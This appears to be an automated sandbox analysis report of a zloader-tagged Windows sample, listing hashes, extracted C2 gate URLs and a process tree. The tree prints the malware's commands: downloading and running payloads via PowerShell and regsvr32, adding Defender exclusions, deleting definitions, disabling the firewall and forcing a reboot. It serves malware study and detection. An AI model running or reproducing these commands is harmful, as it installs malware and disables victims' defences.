Analysis
-
max time kernel
31s -
max time network
102s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
01-08-2021 14:13
Static task
static1
Behavioral task
behavioral1
Sample
start.EXE
Resource
win7v20210408
Errors
General
-
Target
start.EXE
-
Size
165KB
-
MD5
4a53c91d743e8f9b6551893011d04966
-
SHA1
04e949d7d92e86c07a1e0bc72ae39cf2f950f0d6
-
SHA256
243b5b84bb63e98fb3d54e4e1d8592c367540a79f677a464f2c2ea5491f4c90f
-
SHA512
5614a48c1007193c8b6425e7856d68aa60d8c7e2fc5a7875cb6ce92500e176b21584399eb38f1b34dda82e3880cbac1fca1882d09d8265df4107383e21c54d52
Malware Config
Extracted
zloader
ivan
ivan
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 1776 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1684 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
start.EXEdescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce start.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" start.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
start.EXEcmd.exeregsvr32.exedescription pid process target process PID 3920 wrote to memory of 896 3920 start.EXE cmd.exe PID 3920 wrote to memory of 896 3920 start.EXE cmd.exe PID 896 wrote to memory of 1776 896 cmd.exe powershell.exe PID 896 wrote to memory of 1776 896 cmd.exe powershell.exe PID 896 wrote to memory of 2132 896 cmd.exe regsvr32.exe PID 896 wrote to memory of 2132 896 cmd.exe regsvr32.exe PID 2132 wrote to memory of 1684 2132 regsvr32.exe regsvr32.exe PID 2132 wrote to memory of 1684 2132 regsvr32.exe regsvr32.exe PID 2132 wrote to memory of 1684 2132 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\start.EXE"C:\Users\Admin\AppData\Local\Temp\start.EXE"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SYSTEM32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/JavaN.dll -OutFile JavaN.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1776 -
C:\Windows\system32\regsvr32.exeregsvr32 JavaN.dll3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\regsvr32.exeJavaN.dll4⤵
- Loads dropped DLL
PID:1684 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵PID:2496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://qmumdjffuiocstjfmdqt.com/nsudo.bat -OutFile nsudo.bat3⤵PID:2796
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:1972
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://objtqwwsimibwcmnkrqw.com/javase.exe -OutFile javase.exe4⤵PID:1404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"4⤵PID:3592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""4⤵PID:3136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""4⤵PID:928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""4⤵PID:1640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""4⤵PID:3136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""4⤵PID:3592
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵PID:584
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T -ShowWindowMode:Hide icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-184⤵PID:1536
-
C:\Program Files\Windows Defender\MpCmdRun.exeMpCmdRun -RemoveDefinitions4⤵PID:4088
-
C:\Program Files\Windows Defender\MpCmdRun.exeMpCmdRun -RemoveDefinitions -Engine4⤵PID:8
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵PID:1296
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵PID:3788
-
C:\Windows\system32\shutdown.exeshutdown.exe /r /t 004⤵PID:388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Restart-Computer4⤵PID:1772
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d1⤵PID:852
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
56efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
MD5
f7344917f4158a8ef6264dfd5ec7825e
SHA14c02001b020e41c2d3f61eef0e535fcc3ccbce50
SHA256fb22ee01affa2b936b365ac7a783251b9c3677f5858fe439a749737a41292dbd
SHA512abee904f01171c8e2f3988746066be3b018f9d79b2a4c8dc0abbf41d99671e0bba9f4275b29b0e00b32eb44d83205387fe3184ec86e72eeab88dd0b3d2f9ca0a
-
MD5
df4d2f0f806e5d9a39e531e4e563845c
SHA1d260b6ed3880aefb56224a19598ccdfefba615a4
SHA25616c3f0586b1e443adcd11cd3faebe46b5a15b6a452ad9d0ad92034bb9d1b3ff0
SHA51282fde55d2a59b3a8b655f3174d53bf961527432ee8ee0e6a6089c562c56bb3fc469508e9706cfeeb1a3d328aaff03c0ae1f168c7ecb6977ae3fbb1246fbb60be
-
MD5
490358c626e163e8cfd8e31a716b5e40
SHA1cda2e838aeafa043e3da2512ae3d19fadf064167
SHA2562ed758eb7f40fc54df8a4215f91871ec1d58d61743195ad44328aafe385914d3
SHA512c9633d7d4fdd78d5d64924caa0892407a04f122340058bf246a846a90a4ff0db0059372e2edb726e0ad75d3955eddd836fbb7666f63f4289a634c6bc0f294f94
-
MD5
2f697e3f92c0a98bf8b63cad323b8872
SHA13fafe03f526f2837573ef2214b25de1a08b8d3e7
SHA256652c4ce21094b6d414379dbb29d6befe488b5d08e079d9265018f81bb70937e2
SHA512f6c6ddf7537b6c49852768a110c7d298fbc40fa4eff8902c84546786789f694e161095bd9a288a0b9d355301572fcc5c5e21e56dac36d0e153626abb7b675104
-
MD5
77fed1cc5c5166740e0e04975f64b171
SHA167c47b610836200f6003fce22b648ce0696260bf
SHA256ed7a1e4b04a2c1d9ef86ae6fb2c7642ef3489bd76c3a0bf8308afbf61161a769
SHA5127132e5fae382c51bd0a78be2357bd8300107558e3e4426a8de96dcd7f05970d7bd42be0c542f20f58582ae6640b4086677053050a3f1ff4cdb5db2130cbe237d
-
MD5
7de54f12281ba91ec64917853a282624
SHA19584eae25a38e81c6b4ade6e820eca49a3c31241
SHA25650f4d3258eb760f5cea762932c8af61df6934a561857c8d827cbc6746ba6df37
SHA512bc8daa14403714713a06edbefc167ca15b95fa1998984688f1adb84b264b5f7f248c27790259c11a115b378a031891db659785356636526f74182bc1f9f0de64
-
MD5
183d9d22d40c1ab1e8d6f008b53477de
SHA17e3e32de50e5e14c38d9b056c3ae01a4c22b5c06
SHA2560477774baf7e8b5b46dbe104a971a42a1272443c6740238924aca3d9fb83d2db
SHA512bcddbdd5b3f0a75d1997473490b09a6a082e061f3a13365cd0f2856110f8075f4e6db842c9871d03677c7b4192316c475146ca93a17cbdf80636db3bc1d7ea35
-
MD5
968504d7cacafe7167271ff79a4fd277
SHA1cd01083bff3a580baa8a097b4520ef9e75e1278c
SHA25631cce5ba8614ef26951bcadf2728ee20f8d37f8c675b886233606dff1fe2ebfd
SHA5124c8641800c368c8fa753a54dd8617dfc97527b81775c0cb56fee4b77111d36fa0cd87b49a136dfa3ea6e92937f38d3425585faa3d45eca87d89cba52758f0872
-
MD5
447be9ebfadb3c3cb4da566c6cb0e42a
SHA1afb8b37cab651cc393edc403261dad4868e82e85
SHA256ba8cf998c0d7ad902c8d4f1918532db907a78d3823fe29a37b7d19e776e3b475
SHA512b7155ca37dcc429131d2a26a83efc2c844744f98c11b150104e4ee45c50e129b38b0c82143c40b71800dce2fba2a0cb88fd096830623fa6b5550681b440c1c43
-
MD5
39d3cb1f3eeeb8dcc30fe4bcb7b69118
SHA1f3ba55d96e44102e2f4f55169d3ad4f0250cb4ce
SHA256fe1d4880e9c6906690a10089700473011517aeb5763b0c3b74b7ab6fa71d32f9
SHA51269249e519060b980407a5973e8dc12353d7a7ab217c598255aa5d83bdd73562ceb5bac7425bfe7981ecf90c5723bfa84323c777b7269c78b3e8b200b3cee78b9
-
MD5
ea96962aa92b9271cacf64113e773aed
SHA1f57c95747d6655dd0904371053bf8f707ade8056
SHA256b2b6b6e2cdf2bf4c3af67e9d1fa17eba45e113fd3821f46797724644f1bdaaf8
SHA51278b9296bb1cbe1191999ee2043fc2280e55c66033d57385c41a1cd03ff70dc37ebdb6a4a642d8b04303e84b85921e0090a01a261a37dc24330d7ef99b7b0fa41
-
MD5
348d6fd40a9e79a681048999873af548
SHA1069f292e298dabc97a7946c25b8833abf0783dc1
SHA2566819b89e1dba92ee4c6eaa7e35880a6d8e1b51047ec4fed392d29a9aeb8e36b7
SHA5127d75ff10763fbf72f0b6a13dbb8f429b6820379f118afd303dad2e2e9c358ea1d220a3afe05d5d949608ee39135f86b27dede86c9062b0ee5b98d0b1591b001e
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
751d7686d93c66a71f07b3437348d632
SHA15643bed79a4beb1ac278994ca1e32dc3208da97b
SHA2564cb46cf91fd3d098c0405db0044654c15368e971a3943d47829862ecef994829
SHA5123fbee16d97727cac9a7ab389e650491ef722f908968bd0ee9d21aea86ad8ee838c14282e61188fd18db6226fb5be366d3a46c91aedbff7895ec1b91ab1e9e1f9
-
MD5
348d6fd40a9e79a681048999873af548
SHA1069f292e298dabc97a7946c25b8833abf0783dc1
SHA2566819b89e1dba92ee4c6eaa7e35880a6d8e1b51047ec4fed392d29a9aeb8e36b7
SHA5127d75ff10763fbf72f0b6a13dbb8f429b6820379f118afd303dad2e2e9c358ea1d220a3afe05d5d949608ee39135f86b27dede86c9062b0ee5b98d0b1591b001e